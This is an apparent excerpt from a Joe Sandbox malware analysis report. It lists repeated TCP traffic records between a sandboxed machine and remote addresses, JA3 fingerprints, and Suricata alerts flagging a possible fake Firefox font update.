Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49704
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.7:49703
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.7:49698
Source: Joe Sandbox ViewIP Address: 198.12.89.24 198.12.89.24
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 13.107.246.60:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 13.107.246.60:443
